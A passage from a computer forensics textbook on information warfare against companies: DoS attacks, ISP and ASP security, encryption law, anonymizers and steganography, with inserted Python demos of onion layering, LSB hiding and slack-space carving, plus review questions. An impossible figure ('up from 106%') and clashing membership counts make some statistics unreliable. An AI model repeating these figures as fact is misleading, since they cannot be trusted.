later attack, and once a company has been attacked, the problem is in recovery
...
Don’t be surprised if algorithms eventually wind up in the private sector
...
In the
worst-case scenario, every major industry sector would be affected
...
When you’re talking about IW, you’re talking about IT systems used to cripple
the government and economy
...
Since 1999, IW preparedness has moved forward the fastest in the highly regulated and well-organized financial, energy, and telecommunications sectors, but IT
leaders in the private sector say they’re hesitant to report incidents to agencies such
as the NSA and the FBI
...
Although the impact of IW bears the same uncertainty as Y2k did, many IW experts say cyberterrorism and cyberwarfare are inevitable
...
They’ve also shown they can hack armies of unwitting computers and
make those computers do their bidding
...
So are countries such
as China and Russia, which are developing their own IW capabilities
...
Clearly, the
eventuality of such an attack is present
...
The presidential directive predicts that such a scenario is still years away
...
Let’s count them for a typical worker
...
He needs still another to access
his corporate email
...
When he gets home, he needs a password to log on
to his home computer and a handful more to use online services
...
com and
other online merchants also require a password to make purchases
...
With as unique a fingerprint as a password, corporations can be sure that a person logging on to a computer network is who he or she claims to be
...
According to Gartner Group, within three or
four years about 88% of all corporations will use fingerprint readers or some other
kind of biometric device
...
The 1990s switch to network computing, which moved important data from mainframe computers to
servers, increased the flow of information within a company, but in the process, it
made that information more vulnerable to theft and tampering
...
Corporate networks are not the only potential commercial application for biometrics
...
In recent small tests,
MasterCard began using fingerprints as a substitute for a signature
...
The explosion of ecommerce [4] has also created a gigantic need to authenticate the identity of buyers
...
In 1994, the smallest fingerprint
reader sold by Identicator Technology was the size of a telephone and cost $2,000;
today it’s the size of a sugar cube and sells for $64
...
It’s likely that more than one biometric technology will emerge
...
Facial recognition technology also has its advantages
...
About 11% of all
new PCs, including some laptops, are already equipped with cameras, suggesting
that facial recognition may eventually play a role on the Web
...
Consumers may decide that using a face or
a fingerprint as a password will jeopardize privacy more than protect it
...
The events during that 48-hour period in February
2000 were especially fearsome to service providers, who found out just how vulnerable they were
...
To be sure, most service providers have not created a formal list of security requirements, but many have some kind of policy that dictates what companies can
and cannot do as customers and the kinds of security systems that must be in place
before they can purchase services
...
They also
want IT shops to use tools such as anti-virus software, specified intrusion detection
systems, and anti-spam content filtering
...
Precisely when ISPs started getting tougher is hard to determine, but it’s clear
that ISPs weren’t making these types of security demands before the DoS attacks
began
...
The ISPs’ systems were commandeered and used to launch
virus attacks and DoS attacks, as well as to commit vandalism and theft
...
From the ISPs’ point of view,
their own customers or prospective customers are now security threats
...
Now, all architecture has to be approved by the security desk before services are
offered, and a customer with single-tier access won’t be approved, even though
many want to be
...
The
VPN (the cheaper of the two options) costs an additional $790 per month
...
Sometimes providers
want to look under the hood
...
According to a survey in 2004 by the Computer Security Institute (CSI) and the San Francisco FBI Computer Intrusion Squad, 83%
of CSI’s 929 member companies detected unauthorized use of their systems during
the previous year, up from 106% in 2003
...
CSI has 973 security professionals onboard (more than one IT person per company in some cases), and 95% consider disgruntled employees to be
the biggest security threat
...
The FBI reports that there are now 500,000 known computer viruses, and that at least 73% of American companies reported that they have
been plagued by some type of computer virus
...
In the past year, ISPs have set up entire departments devoted to fielding
phone calls and handling subpoenas from individuals and companies claiming that
ISP customers are spamming, sending viruses, vandalizing Web sites, and launching DoS attacks
...
They say it’s no longer up to clients to determine how risk-free they want to be
when it comes to e-commerce
...
How much more companies will pay depends on how secure the ISP thinks its
customers’ network should be, but the ISP is, in many cases, dictating the terms
...
This
could mean a huge cash outlay before service even starts
...
This is an emerging trend, not a government regulation, so
it’s entirely fair for IT managers to bark back, particularly when many ISPs still
can’t deliver the security services they’re asking customers to have up front
...
If a company must go elsewhere for security, it then
begs this question: What level of security does the ISP offer corporate customers? If
ISPs demand that customers walk into the relationship with higher levels of security, corporate customers can turn the tables and demand the same of the ISPs
...
When an ISP tells you to
open up your system so they can look around and see if you meet their standards,
tell them you want them to do the same
...
Once companies open up the conversation to include both sides, it
becomes more of a negotiation and less of an ultimatum
...
If
they’re not going to manage a certain aspect of your network, like a certain server,
then they don’t need access
...
Besides, it’s the ISP’s responsibility to monitor a customer’s outgoing traffic, so the
ISP already has access to what it needs to know to protect itself
...
The best way to protect the company is to handle these issues in the service level
agreement (SLA)
...
The ISP market is more competitive than ever
...
The competition means it’s in the ISP’s
best interest to offer corporate customers as much value-added as possible
...
The reality is that even if ISPs can dictate security policies, they will be eager to
offer value-added services
...
A good SLA won’t get the company out of paying more for application service
providers (ASP) and ISP services in the end
...
The truth is that ISPs
will dictate how much security customers will have because they can
...
IT managers should understand that pushing back at the ISPs will only do so
much
...
The ISPs started the trend, but it won’t
end with them
...
Ultimately, the ISPs will protect themselves from outgoing traffic by shutting
Web sites down that have been commandeered for DoS and other attacks
...
It’s only during this interim period that the onus will be on companies that use ISPs to pick up the slack
...
Companies that
want to do business with top-tier providers had better get serious about security
...
An information security officer for the New York State Office of Mental Health
is considering the ASP model, but he’s afraid patient data could end up in the
wrong hands
...
Think
of the commercial windfall if any of these hosting companies started selling social
services data or any other government agencies’ data
...
And indeed it does
...
What is most disturbing is that the hosting companies all had privacy policies in place, which they were violating
...
They could be random terrorists seeking out corporate data (any
data) to destroy as part of an IW tactic
...
At least, that’s what they
claimed to be doing
...
If the customers agree, it could be great, but that is a big if
...
Selling customer data is taboo for most ASPs, whose executives cringe at the
prospect and chalk it up to a few bad apples who will soon be out of business
...
An ASP should also be bound to a privacy policy as part of the service contract
...
Make sure you take a close look at the wording to see what
constitutes a sale or transfer of data (see sidebar, “Data Protection Measure Tips”)
...
Limit staff access to data and set up multiple levels of security
...
Separate the data center from corporate offices
...
Install security cameras in the data center
...
Keep the “what-ifs” in mind: If providers go bust or are acquired, what happens
to the data?
Do a background check on the provider and check references
...
What if the hosting provider goes out of business? Is it permissible to sell its
customers’ information as an asset (as online retailer Toysmart
...
PRIVACY AGREEMENTS
What’s stopping hosting providers from selling their customers’ data? Ethics and little else, according to industry watchdogs
...
Right now, a lot can be bought and sold rather freely, and that includes the business
sector
...
People tend to overlook that
...
Privacy policies have
more holes than Swiss cheese
...
A lot
of ASPs offer free services
...
In their rush to sign on, customers don’t even look at the privacy policy
...
The ASP Industry Consortium
is working with the World Intellectual Property Organization to establish dispute
resolution procedures between ASPs and their customers, covering such areas as
copyright and proprietary rights infringement and loss of data or data integrity
...
Many ASPs, for example, check the backgrounds of the data center staff and restrict their access to
data
...
Another safeguard is making data center employees pass through several security levels, including physical security guards, key-card door access, and even biometric hand scans
...
For example, it’s too easy to say, “I work with
the company,” flash an ID and walk right in
...
To test an ASP’s privacy policy and security measures, customers should hire
an outside auditing firm
...
Some ASPs even
get in on the auditing act
...
TrustE, of San Jose, California,
gives out privacy seals of approval, called “trustmarks,” to Web sites
...
To get a privacy seal of approval, software companies have to disclose their data-gathering
and dissemination practices
...
ASP clients
are sharpening their scrutiny of data privacy
...
Most won’t work with ASPs that don’t have a solid
one in place
...
Although repeated attacks have increased awareness of the problem, and technologies for dealing
with DoS attacks are seemingly on their way, the attacks have become more sophisticated—and the problem is not going away
...
The attacks have gone from just Web servers to enterprises and infrastructure
...
So, what do you do when terrorists
keep attacking?
Solutions on the Way
Several groups are attempting to work together to fight DoS attacks
...
So-called ICMP Traceback Messages, or itrace,
could turn DoS attackers from anonymous vandals into easily tracked criminals
...
The Information Technology Association of America, with 23 other major
technology companies, has formed the Information Technology Information Sharing and Analysis Center, or IT-ISAC
...
Such tracking is difficult today because the tools used by the vandals who start
such attacks can be modified to appear to come from a completely different source
than the real one
...
Without such cooperation, an attacker may be difficult to find, but stopping the attack is possible
...
Today, customers are more interested in keeping their connection to the Internet up and working than prosecuting an attacker
...
They just want to keep on doing business
...
The Information Warfare Arsenal and Tactics of Private Companies
491
The only solution is to trace things back and turn them off, and that requires a lot of cooperation
...
It has got to be a community effort
...
Without Internet service providers cooperating, tracking the attacks is impossible
...
There are more and more machines out there, and consequently, that means
more and more vulnerable machines
...
Until companies act together to make the Internet more reliable, business on the Net is at risk
...
However, some companies have become either virtual vigilantes or
packet pacifists
...
In December 1999, when protesters were rampaging through Seattle in an attempt to disrupt the World Trade Organization (WTO) summit meeting, other activists were launching a DoS attack on the WTO Web site
...
The e-hippies coalition, based in the U
...
, never publicly acknowledged that the attack had been turned back on its own server, but the next
day, a notice appeared on the e-hippies site apologizing for people having problems
getting through to its site
...
Conxion, the San Jose hosting service that reversed the attack on the WTO
server, recognized the attack was coming from a single IP address belonging to the
e-hippies server
...
Conxion
was so proud of having given the attackers a dose of their own medicine that it issued a press release about the incident
...
According to industry analysts, most IT professionals will not strike back in cyberspace, for fear of hitting an innocent bystander, but they’re not averse to taking
some action when they’re sure of the perpetrator’s identity
...
Intrusion detection tools, for example, can be configured to reverse attacks
...
492
Computer Forensics, Second Edition
Nevertheless, brace your networks for more distributed attacks, nastier viruses, and more chaos until these
issues sort themselves out
...
COUNTERING SUSTAINED ROGUE IW
Corporate reputations have taken a sustained beating from rogue Internet messages, fake press releases, and “gripe sites”
...
To do that, companies are hiring Internet IW monitoring firms that use software that scans the Internet to find out what’s being said about business clients
...
The investigations usually turn up former employees, disgruntled insiders, or
stock manipulators
...
A flurry of messages may actually be the work of only one or
two people who use different handles to make it look like they’re a crowd
...
It
should be a serious lawsuit, based on a cost-benefit analysis
...
In one recent case, a psycholinguist studied 40
messages from three screen names and concluded that they came from the same
writer because they had the same format: a question in the headline and the answer
in the body
...
Based on the analysis, the psycholinguist surmised that the writer was probably
40, white, professional, and perhaps a day trader
...
Private eyes can also engage suspects in online conversations to seek clues
about their identities, but there’s a danger that the undercover gumshoe could tip
his or her hand or cross the line into entrapment
...
For example, perpetrators may have left some electronic footprints behind by filling out a Web site guest book with the same cybersignature they use later
for derogatory messages
...
If they say it’s snowing
outside, you can check weather records to find out where on the planet it’s
snowing right now, to narrow the suspect pool
...
Apparently, private companies are willing to go to great lengths to identify Internet content that besmirches their corporate reputation or infringes on their intellectual property, but such services can be used for much more than just
defending against sustained rogue IW in the form of defamation and piracy
...
In other words, they begin to use Internet surveillance for benchmarking and
competitive intelligence, such as finding out when a competitor adds a new feature,
such as online customer chat, to its Web site
...
Law enforcement’s new weapons for protection against random rogue IW, with
regard to electronic detection, have spurred privacy proponents to strike back, but will
these shifting tactics by law enforcement agencies really protect private companies?
PROTECTION AGAINST RANDOM ROGUE IW
The growing availability of powerful encryption has, in effect, rewritten the rule
book for creating, storing, and transmitting computer data [5]
...
Governments worldwide have
been sent into a spin for fear secret encryption keys will add to the weapons of terrorists and other criminals
...
Such bans have largely failed
...
Now, some governments are granting law enforcement agencies new
powers and funding the development of new tools to get at computerized data,
encrypted or otherwise
...
New Legislation
One legal tactic being used by states is to require owners of encrypted files to decrypt them when asked to by authorities
...
In Britain, two recent bills would give law enforcement officers the authority to
compel individuals to decrypt an encrypted file in their possession under pain of a
two-year jail term
...
The bills broadly define encryption, even including
what some consider to be mere data protocol
...
After all, a
suspect may truly be unable to decrypt an encrypted file
...
If public-key encryption was used, the sender of a file will
have the key used to encrypt the file, but rarely, if ever, the decryption key, which
remains the exclusive property of the intended recipient
...
This flaw in the legislation was demonstrated
by a British group that mailed an ostensibly incriminating document to a government official and then destroyed the decryption key, making it impossible for that
official to decode the file, even if “compelled”
...
This means the defendant may have a hard time
defending himself and makes it a lot easier for the police to fabricate evidence
...
Escrowed Encryption
Another controversial scheme for letting law enforcement in on encrypted data is
known as escrowed encryption
...
In other words, encrypted files would be protected—
except from the state
...
Even if a sound case could
be made for revealing the decryption key to government personnel, what is to prevent them from reusing that key in the future to look at other documents by the
same user? Furthermore, drug traffickers, terrorists, and others of most concern to
law enforcement are the least likely to use encryption that is openly advertised as
readable by the government
...
Sovereign states, with their own interests to
protect, would object to such a system; this happened with the escrow scheme
known as the “Clipper Chip,” which was heavily promoted by the U
...
government
but largely dismissed by other states
...
In view of such concerns, official support for escrowed encryption has all
but died in the United States and elsewhere
...
They are instead seeking to capitalize on
the unencrypted nature of most digital traffic and to derive information by monitoring that traffic
...
Officially, most states deny the existence of electronic surveillance networks,
but extensive claims of their existence persist
...
Echelon is, according to the Washington,
DC–based Federation of American Scientists, a global network that searches
through millions of interceptions for preprogrammed keywords on fax, telex, and
email messages
...
S
...
It would monitor traffic on both government and commercial networks,
with the stated goal of safeguarding the critical U
...
information infrastructure
...
Meanwhile, a number of civil rights
groups, including the Electronic Privacy Information Center (EPIC), in Washington, DC, and the American Civil Liberties Union, based in New York City, have
challenged FIDNet’s constitutionality
...
Computer Forensics
As society relies increasingly on computers, the amount of crime perpetrated
with the machines has risen in kind
...
Indeed, in their present
shape, computers, the Internet, and email are the most surveillance-friendly
media ever devised
...
Its purpose is not only to find out what files are stored in a computer, but also
to recover files that were created with, stored in, sent by, received from, or merely
seen by that computer in the past, even if such files were subsequently “deleted” by
the user
...
For example, the
delete command in most software does not delete
...
If it was really deleted, then undelete commands would not work
...
Even if a user were to deliberately
overwrite the original file, the temporary version still lurks in some part of the disk,
often with an unrecognizable name and occasionally even invisible from the conventional directory
...
A recipient of the electronic end result can see how the document evolved over time—not the kind of information most people care to share
...
For example, the popular Web browser Netscape Navigator creates a file called
netscape
...
Simply surfing the Web pushes other data into computer memory, in the guise
of “cookies” and as documents “cached” on one’s disk
...
A remote Web
site could even gain full access to a visitor’s hard disk, depending on how aggressive
that remote site elects to be and how extensive the protective measures taken by the
visitor are
...
Not to be outdone, computer programmers have developed numerous tools that can defeat most computer
forensics tools
...
In the absence of a thorough schooling in the esoteric
details of computers, the odds favor the competent computer forensics investigator
...
In December 1999, for example, the Australian
Parliament passed a bill giving the Australian Security Organization the power to
obtain warrants to access computers and telecommunications services and, if necessary, to delete or alter other data in the target computer and conceal the fact that
anything had been done under the warrant
...
Countermeasures
The various legal roadblocks and technical wizardry contrived by governments and
law enforcement to block encryption’s spread have, of course, curbed neither the
need for the technology nor the ingenuity of privacy-loving programmers
...
Among them are anonymizers, which conceal the identity of the person
sending or receiving information, and steganography, which hides the information
...
Less dramatic situations also justify
anonymity, such as placing a personal ad or seeking employment through the Internet without jeopardizing one’s current job
...
Anonymous and pseudonymous remailers are computers that are accessible
through the Internet that launder the true identity of an email sender
...
A pseudonymous remailer replaces the sender’s email
address with a false one and forwards the message to the intended recipient
...
Anonymous remailers come in three flavors: cypherpunk, mixmaster, and Web-based
...
Conceivably, someone with physical access to such a remailer’s phone
lines could correlate the incoming and outgoing traffic and make connections
...
But even mixmasters can be compromised
...
A sending an
encrypted message through a remailer, and Ms
...
Web-based anonymizers range from sites offering conventional anonymizer services to others where the connection between the user’s computer and the anonymizer
is itself encrypted with up to 128-bit encryption
...
For extra privacy, a message may be routed through a series of remailers
...
onion-router
...
What’s more, it allows anonymized and multiply encrypted Web
browsing in real time
...
The initiator instructs router W (in this
case, a proxy server at the firewall of a secure site) to create an onion, which consists of public-key-encrypted layers of instructions
...
The onion then
goes to Routers Y and Z, depositing keys at each stop
...
To respond, the recipient sends the message to
Router Z, which encrypts the text, onion-style, and sends it back through the already established path
...
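The onion described above (router W wraps the message in nested encrypted layers, each router strips one layer and learns only the next hop) can be shown end to end in a few dozen lines. The following is an added example and not code from the book or from the onion-router project: it uses a constructed per-hop symmetric layer cipher (SHA-256 keystream plus an HMAC tag) rather than the public-key layers the text describes, and the router names W, Y and Z, the keys and the message are all made up for the demonstration. The point it adds is visible in the routing simulation: no intermediate router can read the payload or peel a layer that is not its own, and any modification of a layer is caught by the tag check before forwarding.

```python
import hashlib
import hmac
import os

# Toy per-hop layer cipher: SHA-256 keystream in counter mode plus an HMAC tag.
# This illustrates *layering*; it is not a recommended cipher. Real onion routers
# use public-key encryption to establish the per-hop keys deposited at each stop.
NONCE_LEN = 16
TAG_LEN = 32


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def wrap_layer(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt one layer for one router: nonce || tag || body."""
    nonce = os.urandom(NONCE_LEN)
    body = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + body, hashlib.sha256).digest()
    return nonce + tag + body


def unwrap_layer(key: bytes, blob: bytes) -> bytes:
    """Strip one layer; raises ValueError if the tag does not verify under this key."""
    nonce = blob[:NONCE_LEN]
    tag = blob[NONCE_LEN:NONCE_LEN + TAG_LEN]
    body = blob[NONCE_LEN + TAG_LEN:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("layer integrity check failed")
    return bytes(b ^ k for b, k in zip(body, _keystream(key, nonce, len(body))))


def build_onion(route: list, keys: dict, message: bytes) -> bytes:
    """Wrap `message` so each router in `route` can peel exactly one layer.

    The innermost layer (for the last router) carries DELIVER + message; every
    outer layer carries only the name of the next hop and the remaining onion.
    """
    onion = wrap_layer(keys[route[-1]], b"DELIVER\n" + message)
    for prev, nxt in reversed(list(zip(route[:-1], route[1:]))):
        onion = wrap_layer(keys[prev], b"NEXT " + nxt.encode() + b"\n" + onion)
    return onion


def route_onion(onion: bytes, keys: dict, first_hop: str):
    """Simulate the routers forwarding the onion. Returns (path taken, delivered message)."""
    path = []
    current = first_hop
    while True:
        path.append(current)
        header, rest = unwrap_layer(keys[current], onion).split(b"\n", 1)
        if header == b"DELIVER":
            return path, rest
        if not header.startswith(b"NEXT "):
            raise ValueError("malformed layer header")
        current = header[5:].decode()
        onion = rest


def _demo_keys() -> dict:
    # Constructed keys for routers W, Y and Z (assumed names, as in the text).
    return {name: hashlib.sha256(b"hop-key-" + name.encode()).digest() for name in "WYZ"}


def demo():
    keys = _demo_keys()
    onion = build_onion(["W", "Y", "Z"], keys, b"meet at the usual place")
    return route_onion(onion, keys, "W")


def tamper_check() -> bool:
    """True if flipping one bit of the outer layer is detected before forwarding."""
    keys = _demo_keys()
    onion = build_onion(["W", "Y", "Z"], keys, b"x")
    flipped = onion[:-1] + bytes([onion[-1] ^ 1])
    try:
        route_onion(flipped, keys, "W")
        return False
    except ValueError:
        return True


def wrong_key_check() -> bool:
    """True if router Y cannot peel the layer that was wrapped for router W."""
    keys = _demo_keys()
    onion = build_onion(["W", "Y", "Z"], keys, b"x")
    try:
        unwrap_layer(keys["Y"], onion)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(demo())
```

The reply path mentioned in the text (Router Z wrapping the response onion-style back along the established path) is the same construction run in the opposite direction with the same per-hop keys.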
The microdot consisted of a greatly reduced photograph of a page of text, which was
pasted over a period in an otherwise innocuous document
...
Unlike encryption, which hides the content of a message in
an obvious manner, steganography hides the mere existence of anything hidden
...
The resulting file sounds
the same to the human ear and is the same length as the original file
...
Typical images use 256 levels of brightness, with 8 bits per pixel for black-and-white
images and 8 bits for each of the three primary colors (red, green, and blue) per
pixel for color images
...
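The brightness figures above explain why image steganography is hard to notice: with 8 bits per sample, replacing the least significant bit changes a pixel's value by at most one level out of 256. The block below is an added example, not code from the book or any steganography tool; it embeds a payload in the LSBs of a constructed flat list of 8-bit grayscale values (with a 2-byte length header, an assumption of this example), extracts it again, and reports the largest per-pixel change so the "looks the same" claim can be checked numerically.

```python
def lsb_capacity_bytes(pixels) -> int:
    """Bytes that fit in the LSBs of `pixels`, minus the 2-byte length header."""
    return len(pixels) // 8 - 2


def _to_bits(data: bytes):
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def _from_bits(bits) -> bytes:
    return bytes(int("".join(str(b) for b in bits[i:i + 8]), 2) for i in range(0, len(bits), 8))


def embed_lsb(pixels, payload: bytes):
    """Return a copy of `pixels` whose least significant bits carry `payload`."""
    if len(payload) > lsb_capacity_bytes(pixels):
        raise ValueError("payload too large for this cover")
    bits = _to_bits(len(payload).to_bytes(2, "big") + payload)
    stego = list(pixels)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit  # touch only the lowest of the 8 bits
    return stego


def extract_lsb(pixels) -> bytes:
    """Read the length header, then that many bytes, from the LSBs."""
    lsbs = [p & 1 for p in pixels]
    length = int.from_bytes(_from_bits(lsbs[:16]), "big")
    return _from_bits(lsbs[16:16 + 8 * length])


def max_pixel_delta(cover, stego) -> int:
    """Largest change to any brightness level; LSB embedding never exceeds 1."""
    return max(abs(a - b) for a, b in zip(cover, stego))


def constructed_cover(n: int = 512):
    # Constructed 8-bit grayscale "image" as a flat list of brightness values.
    return [(i * 37 + 11) % 256 for i in range(n)]


if __name__ == "__main__":
    cover = constructed_cover()
    stego = embed_lsb(cover, b"hidden note")
    print(extract_lsb(stego), max_pixel_delta(cover, stego))
```

For a color image the same routine runs over each of the three 8-bit channels, which triples the capacity; detection tooling works the other way round, looking for LSB statistics that no longer match the rest of the image.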
Hiding data in the areas of a computer floppy disk or hard drive that are normally
not accessed
...
When a file is saved, it uses a portion of one or more
clusters; because DOS and Windows store only one file per cluster, the space left
over between the end of a file and the end of the cluster (called the slack) is available to hide data in
...
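The two points made above, that "deleted" or overwritten data often survives on disk and that the slack between the end of a file and the end of its last cluster can hold data, can be demonstrated with a small carving routine. This is an added example, not the book's or any forensic tool's code: it assumes a 4,096-byte cluster (real FAT cluster sizes depend on the volume) and builds a constructed three-cluster volume image in which a 20-byte file has been written over the start of a cluster that previously held a longer file, so the rest of the old contents sit in the new file's slack.

```python
import math
import re

CLUSTER_SIZE = 4096  # assumed cluster size for this example; FAT sizes vary by volume


def allocated_bytes(file_size: int, cluster_size: int = CLUSTER_SIZE) -> int:
    """Bytes actually reserved for a file: whole clusters, rounded up."""
    return math.ceil(file_size / cluster_size) * cluster_size


def slack_length(file_size: int, cluster_size: int = CLUSTER_SIZE) -> int:
    """Bytes between the logical end of the file and the end of its last cluster."""
    return allocated_bytes(file_size, cluster_size) - file_size


def carve_file_slack(image: bytes, first_cluster: int, file_size: int,
                     cluster_size: int = CLUSTER_SIZE) -> bytes:
    """Return the slack region of a file stored contiguously from `first_cluster`."""
    base = first_cluster * cluster_size
    return image[base + file_size: base + allocated_bytes(file_size, cluster_size)]


def printable_strings(data: bytes, min_len: int = 6):
    """Runs of printable ASCII, like the `strings` utility an examiner would run."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def build_demo_image():
    """Constructed 3-cluster volume: cluster 1 once held a longer file, then a
    20-byte file was written over its start. Returns (image, first_cluster, size)."""
    image = bytearray(3 * CLUSTER_SIZE)
    old_contents = b"OLD DRAFT: salary figures for Q3 ... " * 8
    image[CLUSTER_SIZE:CLUSTER_SIZE + len(old_contents)] = old_contents
    new_file = b"hello, forensics 1.0"  # 20 bytes; only these overwrite the old data
    image[CLUSTER_SIZE:CLUSTER_SIZE + len(new_file)] = new_file
    return bytes(image), 1, len(new_file)


if __name__ == "__main__":
    image, first_cluster, size = build_demo_image()
    slack = carve_file_slack(image, first_cluster, size)
    print(slack_length(size), printable_strings(slack)[:1])
```

A directory listing shows only the 20-byte file; the carve routine reads the other 4,076 bytes of the cluster directly from the image, which is why examiners work from a bit-for-bit copy of the media rather than from the file system's view of it.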
The Future of Encryption
Encryption today is as strong as it is because there is no need for it to be any
stronger
...
Meanwhile, an encryption method can be strengthened by
merely adding bits to the encryption key
...
Few microprocessors have been specially designed to run encryption software
...
For these devices, a new class of algorithms, known as elliptic curve encryption, is claimed to
provide encryption strength equal to that of the standard algorithms in use today,
while using a smaller key and arithmetic that is easier on microprocessors and that
needs much less memory
...
Voice encryption is a response to the increasing flow of audio traffic over the
World Wide Web, which has led, among other things, to the merging of strong encryption with Internet telephony
...
Perhaps the most advanced such software is Speak Freely, which is available
worldwide free of charge (see http://www
...
org)
...
Instead, they route the
data through the company’s servers, thereby opening up a security weakness
...
Rather, it is a
means for creating and securing the distribution of private keys
...
The precepts of quantum cryptography date from the early 1970s, and research
has been ongoing for the past decade at universities such as Johns Hopkins University, in Baltimore, Maryland, and the University of Geneva in Switzerland; at
U
...
national laboratories such as Los Alamos; and in the corporate sector, at
British Telecom and elsewhere
...
A piece of DNA spelling out the message to be encrypted is then synthesized, and
the strand is slipped into a normal fragment of human DNA of similar length
...
As only one DNA strand
in about 30 billion will contain the message, the detection of even the existence of
the encrypted message is most unlikely
...
In what may be a sign of things to come, the German government announced in May 1999 that it would fund the development and free distribution of
open-source encryption software that the government itself will be unable to break
(see http://www
...
org)
...
Also in 1999, French Prime Minister Lionel Jospin announced a similar shift,
saying that his country would scrap any key escrow plans in favor of free use of
cryptography
...
Independently, the Canadian government announced in October 1999 that it
would not seek to regulate the domestic use of encryption
...
Society’s transformation into a computer-based economy makes protecting corporate and personal information not only desirable
but also necessary
...
A partial solution may be to criminalize the use of encryption
only in the commission of generally recognized serious crimes and to encourage its
use elsewhere
...
Similarly,
the granting of new policing powers to law enforcement agencies will do less to protect a country’s critical infrastructure than building better security technology
...
KEEPING THE AMATEUR ROGUE OUT OF THE CYBERHOUSE
Finally, how do you keep amateur rogues out of the cyberhouse? Today, you probably can’t, but, tomorrow (see Chapter 17, “The Information Warfare Arsenal of
the Future”)—well, that’s another matter
...
Increasingly, these amateur social activists have turned
to hacking to make their point, breaking into computer systems and wreaking havoc
on organizations they oppose
...
The term hacktivist was first applied to supporters of the Zapatista rebels in
Mexico’s southern state of Chiapas, who have sabotaged Mexican government Web
sites since 1998 and held “virtual sit-ins” designed to overload servers
...
In one case, Palestinian sympathizers broke
into a Web site operated by a pro-Israel lobbying group in the United States, stealing credit card information and email addresses
...
Antiglobalist protesters contend
the WTO’s trade treaties benefit big corporations and rich countries at the expense
of the environment and workers
...
Online, however,
they effectively surmounted physical barriers
...
The attacks against forum organizers showed just how far hacktivists could reach
...
This poses operational security
problems and goes beyond what’s been seen before
...
In some respect, it is really quite clever and quite funny
...
The more extreme scenarios discussed in this chapter may never occur
...
It is not advisable for any risk-management
approach to disregard the threats previously discussed on the basis that they are farfetched and fanciful
...
The undetectability of many attacks may lead private companies to a
false sense of security and leave the companies vulnerable to serious disruption or
total disablement in the event of an attack
...
Conclusions
As competition for profit increases between corporations and consumer expectations grow, there may soon be a time that, for some private companies, even a
limited disablement may be fatal, or nearly fatal, to its continued existence, surely
one of the most important post-threat outcomes of any risk-management plan
...
Added to the traditional aggressors identified by private companies are the
ones that may now see the companies as a visible surrogate of an entity that is
either impregnable from attack or that it is inadvisable to attack
...
It must be appreciated that new, and very powerful, tools of aggression may
now be available to those traditional aggressors
...
The approach to determining risk and how to protect against and prevent network attacks must be revised
...
Traditional forms of risk management represent an approach positioned in a
hierarchical paradigm, which may not deal adequately or at all with new forms
of threat posed to a dynamic network
...
Nor will it be able to say that it has treated them
...
An Agenda for Action
Management of cyberterrorism risk must be considered an important issue for all
aspects of society, not only for private companies
...
The dangers in failing to recognize the risk could be serious
...
The U
...
government needs to set an agenda for action that goes beyond the
work already done in preparation for protecting the IW arsenal and tactics of private companies
...
1 in Appendix F),
the computer forensics specialist (CFS) should adhere to the provisional list of actions for networks
...
A number of these systems
have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? As competition for profit increases between corporations and
consumer expectations grow, there may soon be a time when, for some private
companies, even a limited disablement may be fatal, or nearly fatal, to its continued existence, surely one of the most important post-threat outcomes of any
risk-management plan
...
True or False? The decrease in the number of aggressors must be appreciated
...
True or False? Added to the traditional aggressors identified by private companies are the ones that may now see the companies as a visible surrogate of an
entity that is either impregnable from attack or that it is inadvisable to attack
...
True or False? Traditional forms of risk management are particularly suitable
to the dynamic, desegregated forms of aggression
...
True or False? The approach to determining risk and how to protect against
and prevent network attacks must be revised
...
Various aspects of society are being transferred to cyberspace, except:
A
...
Transactional activities
C
...
Infrastructure activities
2
...
Data destruction
B
...
Penetration of a system to modify its output
D
...
The collapse of the former Soviet Union into what could be termed a “transnational kleptocracy” has led to some fundamental changes in the international
security environment, except:
A
...
B
...
C
...
D
...
These enterprises have spread beyond the borders of any particular state
...
Estimates claim that 89% of Russian banks are under criminal control
...
The three elements of IPK are, except:
A
...
Information technology
C
...
Political, ethnic, and religious groups
5
...
Internet protocol
B
...
Traditional psychological operations or deception operations
D
...
Clandestine human intelligence operations or overt research operations
Exercise
In the preliminary stages of an employment dispute case, a CFS was brought in by
a large computer services corporation to perform a forensic recovery on an employee’s desktop computer
...
How did the CFS go
about conducting the investigation?
HANDS-ON PROJECTS
After finding pornography downloaded on its network server and a number of individual office computers, a client began to build a case for employee dismissal
...
How did the CFST go
about conducting their examination?
Case Project
After being sued for negligence, a client was about to settle a multimillion dollar
suit and rewrite their entire software package because the plaintiff was charging that
the installation of the software in question had permanently damaged/erased existing files; the irreplaceable data was not recoverable by any means and the plaintiff
could not access files in a specific software application critical to running his business
...
The backup tapes (plastic-material) had been co-located
with the server drives and were themselves destroyed
...
How was the CFS able to go about recovering the data?
REFERENCES
[1] Vacca, John R
...
[2] Vacca, John R
...
[3] Vacca, John R
...
[4] Vacca, John R
...
, Charles River Media, Hingham, MA, 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...
To date, the defense establishment has yet to agree on the exact definition of the term information warfare
...
Warnings also come from more sober sources
...
S
...
In other
words, the one thing that everyone agrees on is that in the digital age, information,
and its dissemination, has achieved the status of a vital strategic asset
...
ABC’s Alias and Fox’s 24, don’t hold a candle to La Femme Nikita when it comes to wholesale assassinations and torture
...
Sound implausible? Maybe
...
NSA and the CIA realize that conventional information warfare (IW)
tactics will not be enough in the future to thwart the very dangerous and often suicidal covert terrorist organizations
...
In the very near future, agents trained and armed with an arsenal of futuristic
high-tech weapons and trained in the most sophisticated techniques for carrying out
successful assassinations will swoop down upon deadly terrorist operatives
...
They will also have to keep their
wits about them, as well as ingenuity to keep themselves alive, where a single mistake
could mean death
...
